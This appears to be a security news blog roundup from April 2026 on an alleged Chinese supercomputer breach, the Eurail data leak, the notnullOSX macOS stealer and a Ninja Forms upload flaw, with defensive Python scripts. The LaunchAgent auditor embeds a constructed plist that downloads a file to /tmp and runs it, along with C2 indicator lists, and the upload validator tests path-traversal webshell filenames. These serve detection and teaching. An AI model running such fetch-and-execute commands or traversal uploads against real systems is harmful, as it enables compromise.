Security Check-in Quick Hits: Alleged Chinese Supercomputer Mega-Breach, Eurail Traveler Data Leak, notnullOSX macOS Stealer, and Ninja Forms WordPress RCE Flaw
For April 9, 2026
Alleged Hack of China’s National Supercomputing Center: 10PB of Sensitive Data Claimed Stolen
A hacker (or group) operating under the handle FlamingChina has claimed one of the largest data heists in history: more than 10 petabytes (roughly 10,000 terabytes) exfiltrated from China’s National Supercomputing Center (NSCC) in Tianjin. The alleged haul includes classified defense documents, missile schematics, aerospace research, bioinformatics, fusion simulations, and data tied to major state entities like AVIC and COMAC. Samples were reportedly posted to Telegram as early as February 6, 2026, with the extraction said to have taken six months via a compromised VPN and botnet-style distribution to avoid detection.
The story exploded on X after CNN’s April 8 coverage, with experts telling the outlet the samples appear legitimate—yet verification remains incomplete. High-engagement posts (such as from vx-underground) raised red flags: the scale is “unfathomable” in terms of storage costs alone, and the incident flew under the radar of seasoned researchers until now. If confirmed, it would represent a massive intelligence and IP compromise with serious geopolitical stakes.
Takeaway: Even state-backed supercomputing hubs aren’t immune. Organizations managing high-value research or critical infrastructure should prioritize air-gapped segments, continuous monitoring for anomalous exfiltration, and assume supply-chain or VPN vectors as primary risks. Watch for follow-on sales attempts on dark web forums.
Eurail Data Breach Exposes Personal Info of Nearly 310,000 Travelers
Eurail B.V. disclosed that a December 26, 2025 intrusion into its customer database compromised 308,777 individuals. Attackers stole full names, passport/ID numbers, bank IBANs, health information (notably for some young DiscoverEU program participants), email addresses, and phone numbers. The company notified victims on March 27, 2026; samples of the data appeared on Telegram and were offered for sale on the dark web.
Multiple cybersecurity news accounts on X amplified BleepingComputer and SecurityWeek reports, underscoring the breach’s reach across European rail pass holders. Eurail is urging vigilance against phishing and scams, immediate password resets for the Rail Planner app, and close monitoring of bank accounts.
Takeaway: This is a textbook example of why travel and identity data remain high-value targets. Individuals should treat any unsolicited Eurail-related contact as suspicious, enable multi-factor authentication everywhere possible, and consider credit freezes or fraud alerts if their details were involved. Companies holding passport-level data must treat it with the same rigor as payment cards—breach notification delays like this only amplify the damage.
notnullOSX: Sophisticated Go-Based macOS Stealer Returns Targeting High-Net-Worth Crypto Users
Moonlock Lab detailed the resurgence of notnullOSX, a modular macOS stealer from underground developer alh1mik (formerly 0xFFF). First spotted in late March 2026 across Vietnam, Taiwan, and Spain, the malware is distributed through ClickFix social-engineering campaigns (fake Google Docs prompting Terminal commands) and trojanized DMG installers, including a hijacked YouTube channel promoting a fake “WallSpace” live wallpaper app.
Once installed, it requests Full Disk Access via social engineering, then quietly grabs crypto wallets (Bitcoin Core, Electrum, etc.), browser credentials, iMessage/Notes/Telegram history, SSH keys, cloud configs, and even trojanizes hardware wallet apps. It exfiltrates via Firebase Realtime Database and is explicitly tuned for victims holding over $10,000 in crypto. The binary is multi-arch, has low VirusTotal detection, and uses LaunchAgent persistence.
X posts from Virus Bulletin and others highlighted the sophisticated distribution and developer-credential focus, signaling supply-chain and lateral-movement potential.
Takeaway for macOS users: Never paste random Terminal commands from documents or browsers. Scrutinize any Full Disk Access prompts, audit LaunchAgents, and block known C2 domains (e.g., mactest-6b2ab-default-rtdb.firebaseio.com). Security teams should watch for unusual Mach-O downloads from filestackcontent.com and /tmp grabber modules. If you hold significant crypto on macOS, consider hardware wallets kept offline and endpoint detection tuned for these TTPs.
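To make the "audit LaunchAgents" advice concrete, here is an added example (not Moonlock's tooling and not part of the original post) that parses LaunchAgent plists and flags the indicators named above: the firebaseio.com C2 host, filestackcontent.com downloads, and modules staged in /tmp. The extra strings (curl, osascript, base64) and the sample plist are assumptions constructed for the demo; the sample is not a real notnullOSX artifact.

```python
"""Audit macOS LaunchAgent plists for the persistence pattern described in the
notnullOSX write-up above.  Added example, not Moonlock's code.  On a Mac it
scans the real LaunchAgent directories; the constructed sample at the bottom
lets it run anywhere."""
import glob
import os
import plistlib

# First three indicators come from the report above; the rest are generic
# assumptions about what a download-and-run LaunchAgent tends to contain.
SUSPICIOUS_SUBSTRINGS = (
    "mactest-6b2ab-default-rtdb.firebaseio.com",  # C2 host named in the report
    "firebaseio.com",                              # any Firebase RTDB host
    "filestackcontent.com",                        # payload host named in the report
    "/tmp/",                                       # grabber modules staged in /tmp
    "curl ",                                       # assumption: fetch-and-exec in an agent
    "osascript",                                   # assumption: AppleScript prompts
    "base64",                                      # assumption: encoded stage
)

LAUNCH_AGENT_DIRS = (
    os.path.expanduser("~/Library/LaunchAgents"),
    "/Library/LaunchAgents",
)


def _flatten(value):
    """Yield every string reachable inside a plist value (dict, list or scalar)."""
    if isinstance(value, str):
        yield value
    elif isinstance(value, dict):
        for v in value.values():
            yield from _flatten(v)
    elif isinstance(value, (list, tuple)):
        for v in value:
            yield from _flatten(v)


def audit_plist(data):
    """Return a list of indicator hits for one LaunchAgent plist (empty if clean)."""
    try:
        plist = plistlib.loads(data)
    except Exception as exc:  # a plist launchd cannot parse is itself worth a look
        return [f"unparseable plist: {exc}"]
    program_bits = list(_flatten(plist.get("ProgramArguments", [])))
    program_bits += list(_flatten(plist.get("Program", "")))
    blob = " ".join(program_bits).lower()
    return [f"program mentions {needle!r}"
            for needle in SUSPICIOUS_SUBSTRINGS if needle.lower() in blob]


def scan_launch_agents(dirs=LAUNCH_AGENT_DIRS):
    """Map each LaunchAgent plist path with at least one hit to its hit list."""
    report = {}
    for d in dirs:
        for path in glob.glob(os.path.join(d, "*.plist")):
            with open(path, "rb") as fh:
                hits = audit_plist(fh.read())
            if hits:
                report[path] = hits
    return report


# Constructed sample shaped like the pattern in the write-up (download a stage
# from filestackcontent.com into /tmp and run it).  Not a real artifact.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.wallspace.helper</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>-c</string>
    <string>curl -s https://cdn.filestackcontent.com/EXAMPLE-HANDLE -o /tmp/.grabber; /tmp/.grabber</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>
"""

# Constructed benign agent: a vendor updater launched from its app bundle.
CLEAN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array>
    <string>/Applications/Example.app/Contents/MacOS/updater</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>
"""

if __name__ == "__main__":
    print("sample:", audit_plist(SAMPLE_PLIST))
    print("clean: ", audit_plist(CLEAN_PLIST))
    for path, hits in scan_launch_agents().items():
        print(path)
        for h in hits:
            print("  -", h)
```

String matching on ProgramArguments is a triage aid, not a verdict: a hit means open the plist and look at what the program actually does, and an agent that launches a binary from /tmp or fetches a stage from a CDN at login is worth that look regardless of which C2 host it talks to.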
Critical Arbitrary File Upload Flaw in Ninja Forms WordPress Plugin (CVSS 9.8)
Security researcher whattheslime (via Wordfence Bug Bounty) uncovered an unauthenticated arbitrary file upload vulnerability in Ninja Forms (versions up to 3.3.26). The flaw stems from insufficient validation in the upload handler, allowing attackers to upload PHP webshells via path traversal and filename manipulation—leading to full remote code execution.
A partial fix landed February 10, 2026, with the complete patch in version 3.3.27 on March 19. Infosecurity Magazine coverage, shared on X by The Cyber Security Hub, stressed that sites still on older versions are wide open to automated exploitation.
Takeaway: WordPress site owners running Ninja Forms should update to 3.3.27 immediately (or deactivate the plugin until patched). This is the kind of unauthenticated RCE that automated scanners love—delay equals compromise. Broader lesson: keep all plugins auto-updated where possible and use Web Application Firewalls or virtual patching for public-facing forms.
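The bug class behind this advisory (a file upload handler that trusts the client-supplied name, so traversal and extension tricks land a PHP file in a web-served directory) is easier to see next to a hardened version. The following is an added example written for this page in Python; Ninja Forms is PHP and nothing here reproduces its actual code. The allowlists, the upload directory and the test filenames are assumptions chosen for the demo.

```python
"""Naive versus hardened handling of an uploaded file's name.  Added example
for the upload bug class described above; not Ninja Forms code."""
import os
import secrets

# Assumption: what a typical contact form legitimately accepts.
ALLOWED_EXTENSIONS = {"pdf", "png", "jpg", "jpeg", "gif", "txt", "docx"}
# Extensions a PHP web server may execute or honour; any dot-segment matching
# one is refused, so shell.php.jpg is rejected as well as shell.php.
SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar",
                     "phps", "inc", "cgi", "htaccess"}


class UploadRejected(ValueError):
    """Raised when a client filename fails validation."""


def naive_upload_path(upload_dir, client_filename):
    """The bug class: join the client-controlled name straight onto the upload dir."""
    return os.path.join(upload_dir, client_filename)


def escapes_upload_dir(upload_dir, path):
    """True if the resolved path lies outside upload_dir (path traversal succeeded)."""
    base = os.path.realpath(upload_dir)
    return os.path.commonpath([base, os.path.realpath(path)]) != base


def hardened_upload_path(upload_dir, client_filename):
    """Return a safe destination path for the upload or raise UploadRejected."""
    if "\x00" in client_filename:
        raise UploadRejected("NUL byte in filename")
    # Normalise both separator styles and keep only the last path component,
    # which neutralises ../ and ..\ sequences before anything else is checked.
    name = client_filename.replace("\\", "/").rstrip("/").split("/")[-1]
    if name in ("", ".", ".."):
        raise UploadRejected("empty or traversal-only filename")
    parts = name.lower().split(".")
    # Dotfiles (e.g. .htaccess) and extension-less names carry no safe type info.
    if len(parts) < 2 or parts[0] == "":
        raise UploadRejected("missing extension or dotfile")
    segments = parts[1:]
    if any(seg in SCRIPT_EXTENSIONS for seg in segments):
        raise UploadRejected("executable extension present")
    ext = segments[-1]
    if ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected(f"extension {ext!r} not in allowlist")
    # Never reuse the client name on disk: random name plus the validated extension.
    server_name = f"{secrets.token_hex(16)}.{ext}"
    dest = os.path.realpath(os.path.join(upload_dir, server_name))
    # Belt and braces: confirm the final path still sits inside the upload dir.
    if escapes_upload_dir(upload_dir, dest):
        raise UploadRejected("destination escapes upload directory")
    return dest


def is_accepted(upload_dir, client_filename):
    """Convenience wrapper: True if the hardened validator accepts the name."""
    try:
        hardened_upload_path(upload_dir, client_filename)
        return True
    except UploadRejected:
        return False


if __name__ == "__main__":
    up = "/var/www/html/wp-content/uploads"  # assumed upload directory
    print("naive join escapes dir:", escapes_upload_dir(up, naive_upload_path(up, "../../x.php")))
    for fn in ("resume.pdf", "../../shell.php", "shell.php.jpg", ".htaccess", "photo.JPG"):
        try:
            print(f"{fn!r:20} -> {hardened_upload_path(up, fn)}")
        except UploadRejected as exc:
            print(f"{fn!r:20} -> rejected: {exc}")
```

The validator is deliberately strict in three independent ways (strip directory components, refuse any script-like dot-segment, allowlist the final extension) and then discards the client name entirely, so no single bypass trick is enough. On a WordPress host the same lesson applies at the web server layer: configuring it not to execute PHP under wp-content/uploads means a file that slips past plugin validation is served as bytes rather than run as code.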
These four stories dominated cybersecurity chatter in the past day, blending unverified mega-claims, belated breach disclosures, targeted malware, and everyday plugin risks. The common thread? Attackers continue to exploit trust (in updates, apps, and third-party services) while defenders race to patch and monitor. Stay vigilant, patch early, and question the extraordinary—especially when petabytes are involved.
What stood out to you in today’s feed? Drop your thoughts below. Stay safe out there.